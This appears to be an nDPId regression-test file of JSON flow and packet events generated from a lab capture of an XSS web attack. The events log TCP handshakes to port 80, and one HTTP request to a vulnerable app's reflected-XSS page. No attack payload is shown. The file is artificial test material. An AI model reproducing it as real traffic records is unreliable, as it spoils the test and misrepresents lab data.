+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5334,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":3,"flow_last_seen":1499347606080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347606080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03mBAAD4G53esEAABwKgKMuZsAFA9+okFMn4u\/YAQAOVqZwAAAQEICgE7V1wD5SjR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347607344,"flow_last_seen":1499347607344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1499347607344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8neJAAD4GJ+6sEAABwKgKMuZ6AFBKtMV6AAAAAKACchAONwAAAgQFtAQCCAoBO1iYAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":2,"flow_last_seen":1499347607344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5nrlgxvESrTFe6AScSDf2wAAAgQFtAQCCAoD5SoNATtYmAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":3,"flow_last_seen":1499347607345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347607345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0neNAAD4GJ\/WsEAABwKgKMuZ6AFBKtMV75YMbxYAQAOV+4wAAAQEICgE7WJgD5SoN"} 
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347419786,"flow_last_seen":1499347486791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232681,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347479172,"flow_last_seen":1499347484745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347480438,"flow_last_seen":1499347485746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347481724,"flow_last_seen":1499347486747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347608596,"flow_last_seen":1499347608596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347608596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1499347608596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347608596,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UBJAAD4Gdb6sEAABwKgKMuaIAFDT6AnDAAAAAKACchA\/cwAAAgQFtAQCCAoBO1nRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":2,"flow_last_seen":1499347608596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347608596,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5oh16C+h0+gJxKAScSBrnQAAAgQFtAQCCAoD5StGATtZ0QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":3,"flow_last_seen":1499347608597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347608597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UBNAAD4GdcWsEAABwKgKMuaIAFDT6AnEdegvooAQAOUKpQAAAQEICgE7WdED5StG"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347611162,"flow_last_seen":1499347611162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347611162,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1499347611162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347611162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8at5AAD4GWvKsEAABwKgKMuaiAFBCbDaMAAAAAKACchChiwAAAgQFtAQCCAoBO1xSAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":2,"flow_last_seen":1499347611162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347611162,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5qKcQtTMQmw2jaAScSD\/rQAAAgQFtAQCCAoD5S3IATtcUgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":3,"flow_last_seen":1499347611163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347611163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0at9AAD4GWvmsEAABwKgKMuaiAFBCbDaNnELUzYAQAOWetAAAAQEICgE7XFMD5S3I"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347612465,"flow_last_seen":1499347612465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347612465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1499347612465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347612465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dipAAD4GT6asEAABwKgKMuawAFAlJSuyAAAAAKACchDIWAAAAgQFtAQCCAoBO12YAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":2,"flow_last_seen":1499347612466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347612466,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5rAZOYT0JSUrs6AScSD4FwAAAgQFtAQCCAoD5S8NATtdmAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":3,"flow_last_seen":1499347612467,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347612467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ditAAD4GT62sEAABwKgKMuawAFAlJSuzGTmE9YAQAOWXHgAAAQEICgE7XZkD5S8N"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347613718,"flow_last_seen":1499347613718,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347613718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1499347613718,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613718,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VmlAAD4Gb2esEAABwKgKMua+AFCqCgi7AAAAAKACchBlIgAAAgQFtAQCCAoBO17SAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":2,"flow_last_seen":1499347613719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347613719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5r4KHPZlqgoIvKAScSAxUwAAAgQFtAQCCAoD5TBHATte0gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":3,"flow_last_seen":1499347613719,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347613719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VmpAAD4Gb26sEAABwKgKMua+AFCqCgi8Chz2ZoAQAOXQWgAAAQEICgE7XtID5TBH"} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347611162,"flow_last_seen":1499347615984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347615984,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347616210,"flow_last_seen":1499347616210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347616210,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1499347616210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616210,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YLdAAD4GZRmsEAABwKgKMubYAFBJnwH3AAAAAKACchDJyQAAAgQFtAQCCAoBO2FAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":2,"flow_last_seen":1499347616211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347616211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5thWFuJlSZ8B+KAScSBbkQAAAgQFtAQCCAoD5TK2ATthQAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":3,"flow_last_seen":1499347616212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347616212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0YLhAAD4GZSCsEAABwKgKMubYAFBJnwH4VhbiZoAQAOX6lwAAAQEICgE7YUED5TK2"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347617491,"flow_last_seen":1499347617491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617491,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1499347617491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347617491,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VDpAAD4GcZasEAABwKgKMubmAFD8gja7AAAAAKACchDg0gAAAgQFtAQCCAoBO2KBAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":2,"flow_last_seen":1499347617491,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347617491,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ubMDNHo\/II2vKAScSAL4QAAAgQFtAQCCAoD5TP2ATtigQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":3,"flow_last_seen":1499347617492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347617492,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VDtAAD4GcZ2sEAABwKgKMubmAFD8gja8zAzR6YAQAOWq6AAAAQEICgE7YoED5TP2"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347485533,"flow_last_seen":1499347490747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347617785,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
